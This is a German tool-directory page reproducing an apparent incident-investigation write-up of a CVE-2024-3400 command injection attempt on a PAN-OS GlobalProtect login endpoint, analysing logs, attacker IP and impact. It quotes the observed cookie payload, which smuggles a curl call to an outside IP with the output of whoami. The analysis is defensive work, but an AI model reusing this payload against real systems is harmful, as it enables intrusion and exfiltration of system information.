Tool-Verzeichnis
Kategorien
PAN-OS-CVE-2024-3400-Command-Injection-Investigation — Untersuchung eines PAN-OS CVE-2024-3400 command injection-Versuchs, Analyse der Payload-Übermittlung, internen Verarbeitung und Ausführungsvalidierung auf Basis von Log-Beweisen. | Kitploit
Tools / GitHub / zedocun / pan-os-cve-2024-3400-command-injection-investigation
zedocun/pan-os-cve-2024-3400-command-injection-investigation PAN-OS-CVE-2024-3400-Command-Injection-Investigation Untersuchung eines PAN-OS CVE-2024-3400 command injection-Versuchs, Analyse der Payload-Übermittlung, internen Verarbeitung und Ausführungsvalidierung auf Basis von Log-Beweisen.
1 2 vor 4 MonatenEntdecken Sie die meistgenutzten Tools unserer Community.
Letzte 7 Tage Letzte 30 Tage
Untersuchung eines PAN-OS CVE-2024-3400 Command Injection Versuchs
Überblick
Dieses Projekt dokumentiert die Untersuchung eines CVE-2024-3400 Command Injection-Versuchs , der auf einen PAN-OS GlobalProtect-Dienst abzielt.
Das Ziel war zu ermitteln:
ob es sich um einen echten Angriff handelt
ob eine Befehlsausführung stattfand
ob es Hinweise auf eine Kompromittierung gibt
Alarmübersicht
Ein kritischer Alarm wurde ausgelöst, der auf einen möglichen Exploit-Versuch hinwies.
Target: 172.16.17.139 (PA-Firewall-01)
Source: 144.172.79.92
Endpoint: /global-protect/login.esp
Method: POST
Action: Allowed
Schädlicher Payload
Die Anfrage enthält ein manipuliertes Cookie:
SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)
Wichtige Beobachtungen
${IFS} umgeht die Leerzeichenfilterung
whoami versucht, die Systemidentität abzurufen
curl versucht eine ausgehende Kommunikation
Dies ist ein Command Injection Payload
Webserver-Nachweise Nginx-Logs bestätigen, dass die Anfrage den Server erreicht hat:
POST /global-protect/login.esp
HTTP 200
User-Agent: curl
Die schädliche Anfrage wurde akzeptiert und verarbeitet.
Interne Verarbeitung System-Logs zeigen, dass der Payload die interne Logik erreicht hat:
Wichtige Erkenntnis
Payload wurde in den internen Befehl eingebettet (dt_curl)
ausgehende Anfrage versucht
Ausführungskette erreichte interne Komponenten
DNS-Abfrage fehlgeschlagen → ausgehende Verbindung fehlgeschlagen
Angreifer-Infrastruktur
144.172.79.92
als schädlich markiert
mit einem Hosting-Anbieter verknüpft
Dies bestätigt die Herkunft von einem externen Angreifer.
Netzwerk-Zeitachse Mehrere IPs interagierten vor dem Angriff mit dem System:
Nur 144.172.79.92 ist direkt mit dem Exploit verbunden.
Auswirkungsbewertung
Bestätigt
Exploit-Versuch, der auf CVE-2024-3400 abzielt
schädlicher Payload zugestellt
Anfrage vom Server verarbeitet
Payload erreichte interne Verarbeitung
ausgehender Versuch ausgelöst
Nicht bestätigt
Befehlsausführung im Betriebssystem
Befehlsausgabe
Datenexfiltration
Reverse Shell
Persistenz
laterale Bewegung
Fazit Dies war ein echter Command Injection-Versuch .
Der Angreifer hat erfolgreich:
eine schädliche Anfrage zugestellt
einen Payload injiziert
interne Verarbeitung ausgelöst
es gibt keine bestätigte Ausführung oder Systemkompromittierung
Endgültige Klassifizierung Command Injection-Versuch
Payload verarbeitet - Keine bestätigte Ausführung oder Auswirkung